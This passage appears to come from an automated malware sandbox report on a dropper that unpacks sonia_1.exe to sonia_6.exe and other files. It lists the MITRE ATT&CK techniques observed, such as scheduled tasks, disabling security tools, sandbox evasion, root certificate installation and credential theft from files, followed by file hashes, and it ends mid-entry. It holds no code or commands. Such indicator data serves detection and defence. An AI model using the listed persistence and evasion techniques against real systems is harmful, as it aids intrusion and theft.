                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                    PID:2096

                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                              5
                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                              File Permissions Modification

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1222

                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                              6
                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                              6
                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1063

                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                213e00f202cd18120a1e44ea3a93d267

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                ff07223275c627f04f64b8dc691a2e9eb0239883

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                1ba80ea646c4375e8c7aa286eb25600013d13540d3324996db6a824d0ef9a7ae

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                a4c9c443341d3943c9453ac1237e54f70f942a5c3c6032e86b942d8d16b8acffe61c0f3c1feec9d90d926be147e4272b477f423c830bee09287abf67596e78b2

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                35a5ab71990f411955cba00ae4dcc346

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                c69ae00c634b1a9f0d90eb7564e2f14fcf5114bc

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                5fbdd9a6cf0bc06c5e9d51ce01bb0e537a7581627be1420b29e36dec46067eee

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                af70223952937f8eeb4d79b63367da28cfec1f9fa296966176ff574d20702443f8e1209633b9505232640ea4442f251b830e51b4c8acc3dba67b28ecf5b4a5d5

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                3130041e0778778e105975b6a6557ee2

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                c1bb3b051e161d8ee086ce148bbe7184143e5afb

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                423aab0641c75e3343f66e7012677751f65f92a4bbb51eb595c7aea9745f7807

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                61e0f7123122006d9368152e4b5529fc8b36564d631530b1224f6a4464de92495fd3c227c34d67b0fe38a7dd7e670d45f9162e4a39ea077c5c8dfac80db7050a

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                26cd61ef565145551c22ab45d1a894f1

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5bc842a764de3f5348f37e2f94d96c08e3ca9d2f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                ee78b4e2b565c2ed350b831827bb2efd66b3f4ca8efb1a4cc06925f4cf4afc63

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                0388344a575b62ce7b54f2bfaf56b620606db5aad104e39abf1c9867103e752744df20d4d176ee2b52ffefea79b0bcdf6c6e46fd113a21b4848f1769de7faa12

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\libcurl.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\libcurlpp.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\libstdc++-6.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\setup_install.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\setup_install.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_1.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_1.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_1.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_2.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_2.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_3.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_3.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_4.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_4.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_5.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_5.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_6.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_6.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\04IF7zD_xLV2n_7wGgoFm18M.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                aa9124c12966683d88fe529aa56a2b8e

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                12b4555318b2bbd25755e5ad5763eac36d43d7cb

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                504d241693fbcf7ebad0c3643bc9cad39272ca6b39b67200da91bade6524c066

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3e1e57e6b0f3c67d1e691c0a436aeb06b30ee1be0e844c58183c317a626e2f2c9bc749168810677d94ac2ab6dab506923f2c7af256fe4abcf5ac53034dd14aa4

                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\04IF7zD_xLV2n_7wGgoFm18M.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                aa9124c12966683d88fe529aa56a2b8e

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                12b4555318b2bbd25755e5ad5763eac36d43d7cb

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                504d241693fbcf7ebad0c3643bc9cad39272ca6b39b67200da91bade6524c066

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3e1e57e6b0f3c67d1e691c0a436aeb06b30ee1be0e844c58183c317a626e2f2c9bc749168810677d94ac2ab6dab506923f2c7af256fe4abcf5ac53034dd14aa4

                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\45f6fXEqGg9ZcszhyO12ZBcO.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                SHA256

